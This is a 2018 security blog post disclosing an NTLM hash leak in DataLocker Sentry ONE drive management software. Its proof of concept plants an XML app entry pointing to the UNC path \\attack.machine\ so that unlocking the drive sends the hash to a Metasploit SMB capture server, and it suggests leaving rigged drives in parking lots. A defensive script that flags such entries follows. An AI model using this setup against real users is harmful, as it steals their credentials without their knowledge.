Monday, September 17, 2018

Nabbing NTLM Hashes With DataLocker Sentry ONE Managed USB Drives

The DataLocker Sentry ONE Managed USB drive is a great, affordable, secure self-encrypting device. It features AES-256 full disk encryption with built-in management software that includes an anti-malware scanner. It does, however, have at least one feature that, if exploited, can lead to the user's NTLM hashes being sent to any address the attacker chooses.

I found that the DataLocker Simply Secure device management software can be used to send the current user's NTLM hash to any remote server an attacker chooses, with no interaction from the user and without the user's knowledge. The user simply has to run the unlock software and input the correct password, which auto-launches the management software, triggering an SMB call.


This vulnerability depends on an insider threat or malware. You could drop these in a parking lot and put the password in the cap on a small piece of paper or something. Because it's password protected, people might be more likely to want to check it out.

PoC:
Set up an SMB server that prompts for domain credentials on connect. (Metasploit: auxiliary/server/capture/smb)
Edit the management software config to include the path to the SMB server as an app. (Drive Letter:\.Apps\.apps.db)
Add the following content after the AdditionalApplications tag:
    <Appl>
        <Identifier>0</Identifier>
        <AppPath>\\attack.machine\</AppPath>
        <Args></Args>
        <IconPath></IconPath>
        <DisplayName></DisplayName>
        <Summary></Summary>
        <Url></Url>
        <InternalVersion>0</InternalVersion>
        <OS>0</OS>
    </Appl>
Close and relock the device. Move to another computer or re-run the unlock software.
Authenticate to the device, triggering the SMB request.
View Metasploit for the NTLM hash.
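As an added defensive check (not code from this post or from DataLocker), the script below parses a device's .apps.db and flags any auto-launched AppPath that points off the device, such as a UNC path to another host. The <Config> root element and the second Appl entry are constructed assumptions; only the AdditionalApplications/Appl layout follows the snippet above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of a .apps.db, modelled on the snippet in the post.
# The <Config> root element is an assumption; the <AdditionalApplications>/
# <Appl> layout follows the post. Entry 0 is the remote-path case.
SAMPLE_APPS_DB = r"""<Config>
  <AdditionalApplications>
    <Appl>
      <Identifier>0</Identifier>
      <AppPath>\\attack.machine\</AppPath>
      <Args></Args>
      <IconPath></IconPath>
      <DisplayName></DisplayName>
      <Summary></Summary>
      <Url></Url>
      <InternalVersion>0</InternalVersion>
      <OS>0</OS>
    </Appl>
    <Appl>
      <Identifier>1</Identifier>
      <AppPath>E:\Tools\notes.exe</AppPath>
      <DisplayName>Notes</DisplayName>
    </Appl>
  </AdditionalApplications>
</Config>"""

URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def is_remote_path(path):
    """True for UNC or URL-style paths, i.e. anything whose launch would make
    Windows contact another host instead of opening a file on the device."""
    p = path.strip()
    return p.startswith("\\\\") or p.startswith("//") or URL_RE.match(p) is not None


def audit_apps_db(xml_text, device_drive=None):
    """Return (identifier, AppPath, reason) for each configured app that does
    not live on the device. device_drive, e.g. "E:", additionally flags local
    paths on a different drive (an unexpected entry either way)."""
    findings = []
    for appl in ET.fromstring(xml_text).iter("Appl"):
        ident = (appl.findtext("Identifier") or "").strip()
        path = (appl.findtext("AppPath") or "").strip()
        if is_remote_path(path):
            findings.append((ident, path, "points to a remote host"))
        elif device_drive and not path.upper().startswith(device_drive.upper()):
            findings.append((ident, path, "not on the device drive"))
    return findings
```

Run audit_apps_db over the .apps.db read from the unlocked drive, passing its drive letter; any finding means an app launch will reach outside the device.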

Why they would allow this, or just didn't think of it when they were developing the software, I don't know.